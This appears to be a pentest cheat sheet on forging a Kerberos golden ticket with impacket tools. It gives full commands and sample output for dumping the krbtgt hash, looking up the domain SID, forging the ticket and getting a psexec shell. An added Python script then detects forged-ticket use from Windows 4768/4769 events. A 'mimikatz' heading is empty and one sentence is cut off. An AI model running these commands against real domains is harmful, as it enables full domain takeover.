Golden Ticket

Using mimikatz

Using impacket tools

Extract the krbtgt NTLM hash

secretsdump.py Administrator:<PASSWORD>@10.10.100.200
[...]
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:5508500012cc005cf7082a9a89ebdfdf:::
[...]

Extract the domain SID

lookupsid.py CONTROLLER.local/Administrator:<PASSWORD>@10.10.100.200
[...]
[*] Domain SID is: S-1-5-21-849420856-2351964222-986696166
[...]

Generating the Golden Ticket

Using the krbtgt NTLM hash, the Domain SID, the Domain Name and a

ticketer.py -nthash "5508500012cc005cf7082a9a89ebdfdf" -domain-sid "S-1-5-21-849420856-2351964222-986696166" -domain "CONTROLLER.local" NonExistentUserBla

Using the ticket

ticketer.py writes the forged ticket to <username>.ccache in the current directory, so the account name used here has to match the one passed to ticketer.py above.

export KRB5CCNAME=$(pwd)/NonExistentUserBla.ccache
psexec.py CONTROLLER.local/NonExistentUserBla@10.10.100.212 -k -no-pass
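The steps above show two properties a defender can key on: the account name in a golden ticket does not have to exist in the directory, and the TGT was never issued by the KDC, so the first thing the domain controller sees from that client is a service-ticket request. The following script is an added example, not part of the original notes or of impacket; it runs the two checks over constructed Windows Security events (Event ID 4768, TGT requested, and 4769, service ticket requested) against a constructed directory snapshot. The field names follow the Windows event schema; the account list, the event records and the 10-hour lookback (the default maximum TGT lifetime in a Windows domain) are assumptions for the example.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass
class KerberosEvent:
    """One Security log record, reduced to the fields the checks need."""
    event_id: int          # 4768 = TGT requested, 4769 = service ticket requested
    time: datetime
    target_user: str       # TargetUserName, may carry a realm suffix (user@REALM)
    source_ip: str         # IpAddress of the requesting client
    service: str = ""      # ServiceName (4769 only)


# Constructed directory snapshot: sAMAccountName values, compared case-insensitively.
DIRECTORY_ACCOUNTS = {"administrator", "krbtgt", "alice", "bob", "svc_sql"}


def normalise(name: str) -> str:
    """Strip a realm suffix and lower-case the account name for comparison."""
    return name.split("@", 1)[0].lower()


def find_suspicious_tgs(events, directory, lookback=timedelta(hours=10)):
    """Return (event, reason) pairs for 4769 events that look like forged TGT use.

    Reason 1: the requesting account is not in the directory.
    Reason 2: no 4768 from the same account and client IP within the lookback,
              i.e. the KDC never issued the TGT the client is presenting.
    """
    tgt_seen = {}  # (account, ip) -> time of the latest 4768
    findings = []
    for ev in sorted(events, key=lambda e: e.time):
        user = normalise(ev.target_user)
        if ev.event_id == 4768:
            tgt_seen[(user, ev.source_ip)] = ev.time
            continue
        if ev.event_id != 4769:
            continue
        if user not in directory:
            findings.append((ev, "account not in directory"))
            continue
        last_tgt = tgt_seen.get((user, ev.source_ip))
        if last_tgt is None or ev.time - last_tgt > lookback:
            findings.append((ev, "no TGT issued by KDC within lookback"))
    return findings


# Constructed sample events: one normal session (alice), one forged ticket
# with a made-up name, one forged ticket impersonating Administrator.
T0 = datetime(2024, 1, 1, 9, 0)
SAMPLE_EVENTS = [
    KerberosEvent(4768, T0, "alice", "10.10.100.50"),
    KerberosEvent(4769, T0 + timedelta(minutes=5), "alice", "10.10.100.50", "cifs/fs01"),
    KerberosEvent(4769, T0 + timedelta(minutes=10), "NonExistentUserBla", "10.10.100.99", "cifs/dc01"),
    KerberosEvent(4769, T0 + timedelta(minutes=12), "Administrator@CONTROLLER.LOCAL", "10.10.100.99", "cifs/dc01"),
]


def summarise(findings):
    """Map each flagged account to its reason, for a quick triage view."""
    return {normalise(ev.target_user): reason for ev, reason in findings}


if __name__ == "__main__":
    for account, reason in summarise(find_suspicious_tgs(SAMPLE_EVENTS, DIRECTORY_ACCOUNTS)).items():
        print(f"{account}: {reason}")
```

Both checks are heuristics. The directory check needs a current account list and never fires if the attacker chooses a real name; the missing-4768 check loses precision behind NAT, with clients that roam between addresses, and with legitimate long-lived sessions, so it is best treated as a triage signal alongside ticket-lifetime and encryption-type review rather than a stand-alone alert. Rotating the krbtgt password twice remains the remediation that actually invalidates an issued golden ticket.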
